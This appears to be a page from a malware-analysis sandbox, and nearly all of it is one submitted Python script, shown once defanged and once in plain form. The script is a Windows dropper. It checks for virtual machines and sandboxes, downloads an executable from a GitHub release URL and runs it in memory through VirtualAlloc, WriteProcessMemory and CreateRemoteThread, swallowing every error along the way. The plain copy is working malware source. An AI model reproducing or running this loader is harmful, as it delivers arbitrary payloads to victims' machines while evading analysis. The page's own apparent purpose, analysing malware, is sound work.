hxxp://import requests import io import ctypes from ctypes import wintypes import subprocess import sys import time import platform class Downloader[:] def __init__(self, url)[:] self[.]url = url def download(self)[:] try[:] response = requests[.]get(self[.]url) if response[.]status_code == 200[:] return io[.]BytesIO(response[.]content) except Exception[:] pass return None class Executor[:] @staticmethod def execute_in_memory(binary_data)[:] try[:] # Load the binary data into memory kernel32 = ctypes[.]WinDLL('kernel32', use_last_error=True) virtual_alloc_ex = kernel32[.]VirtualAlloc write_process_memory = kernel32[.]WriteProcessMemory create_remote_thread = kernel32[.]CreateRemoteThread wait_for_single_object = kernel32[.]WaitForSingleObject close_handle = kernel32[.]CloseHandle process_handle = kernel32[.]GetCurrentProcess() # Allocate memory in the current process address = virtual_alloc_ex(0, len(binary_data), 0x1000 | 0x2000, 0x40) if not address[:] raise Exception("VirtualAlloc failed") # Write the binary data to the allocated memory written = wintypes[.]DWORD() if not write_process_memory(process_handle, address, binary_data, len(binary_data), ctypes[.]byref(written))[:] raise Exception("WriteProcessMemory failed") # Create a thread to execute the binary code thread_handle = create_remote_thread(process_handle, None, 0, address, 0, 0, None) if not thread_handle[:] raise Exception("CreateRemoteThread failed") # Wait for the thread to complete wait_for_single_object(thread_handle, 0xFFFFFFFF) close_handle(thread_handle) except Exception[:] pass class SandboxChecker[:] @staticmethod def is_sandbox()[:] try[:] if platform[.]system() == 'Windows'[:] output = subprocess[.]check_output('wmic bios get serialnumber', shell=True)[.]decode() virtual_keywords = ['VBOX', 'VMware', 'VirtualBox', 'Virtual', 'QEMU', 'Microsoft Hyper-V'] if any(keyword in output for keyword in virtual_keywords)[:] return True user_agents = ["sandbox", "spider", "crawler"] if any(agent in requests[.]get("hxxp://www[.]google[.]com")[.]headers[.]get("User-Agent", "")[.]lower() for agent in user_agents)[:] return True sandbox_vars = ['SBOX', 'SANDBOX', 'VMWARE', 'VIRTUALBOX'] if any(var in os[.]environ for var in sandbox_vars)[:] return True except subprocess[.]CalledProcessError[:] pass return False def main()[:] try[:] if SandboxChecker[.]is_sandbox()[:] sys[.]exit() # URL of the binary to download and execute binary_url = "hxxps://github[.]com/AizenWo/Builder/releases/download/v4/Builder[.]exe" # Create downloader and execute in memory downloader = Downloader(binary_url) binary_data = downloader[.]download() if binary_data[:] Executor[.]execute_in_memory(binary_data[.]read()) except Exception[:] pass if __name__ == "__main__"[:] main()

Sharing

Copy URL Twitter E-mail

General

Target

http://import requests import io import ctypes from ctypes import wintypes import subprocess import sys import time import platform class Downloader: def __init__(self, url): self.url = url def download(self): try: response = requests.get(self.url) if response.status_code == 200: return io.BytesIO(response.content) except Exception: pass return None class Executor: @staticmethod def execute_in_memory(binary_data): try: # Load the binary data into memory kernel32 = ctypes.WinDLL('kernel32', use_last_error=True) virtual_alloc_ex = kernel32.VirtualAlloc write_process_memory = kernel32.WriteProcessMemory create_remote_thread = kernel32.CreateRemoteThread wait_for_single_object = kernel32.WaitForSingleObject close_handle = kernel32.CloseHandle process_handle = kernel32.GetCurrentProcess() # Allocate memory in the current process address = virtual_alloc_ex(0, len(binary_data), 0x1000 | 0x2000, 0x40) if not address: raise Exception("VirtualAlloc failed") # Write the binary data to the allocated memory written = wintypes.DWORD() if not write_process_memory(process_handle, address, binary_data, len(binary_data), ctypes.byref(written)): raise Exception("WriteProcessMemory failed") # Create a thread to execute the binary code thread_handle = create_remote_thread(process_handle, None, 0, address, 0, 0, None) if not thread_handle: raise Exception("CreateRemoteThread failed") # Wait for the thread to complete wait_for_single_object(thread_handle, 0xFFFFFFFF) close_handle(thread_handle) except Exception: pass class SandboxChecker: @staticmethod def is_sandbox(): try: if platform.system() == 'Windows': output = subprocess.check_output('wmic bios get serialnumber', shell=True).decode() virtual_keywords = ['VBOX', 'VMware', 'VirtualBox', 'Virtual', 'QEMU', 'Microsoft Hyper-V'] if any(keyword in output for keyword in virtual_keywords): return True user_agents = ["sandbox", "spider", "crawler"] if any(agent in requests.get("http://www.google.com").headers.get("User-Agent", "").lower() for agent in user_agents): return True sandbox_vars = ['SBOX', 'SANDBOX', 'VMWARE', 'VIRTUALBOX'] if any(var in os.environ for var in sandbox_vars): return True except subprocess.CalledProcessError: pass return False def main(): try: if SandboxChecker.is_sandbox(): sys.exit() # URL of the binary to download and execute binary_url = "https://github.com/AizenWo/Builder/releases/download/v4/Builder.exe" # Create downloader and execute in memory downloader = Downloader(binary_url) binary_data = downloader.download() if binary_data: Executor.execute_in_memory(binary_data.read()) except Exception: pass if __name__ == "__main__": main()

Sharing

General

Malware Config

Signatures

Files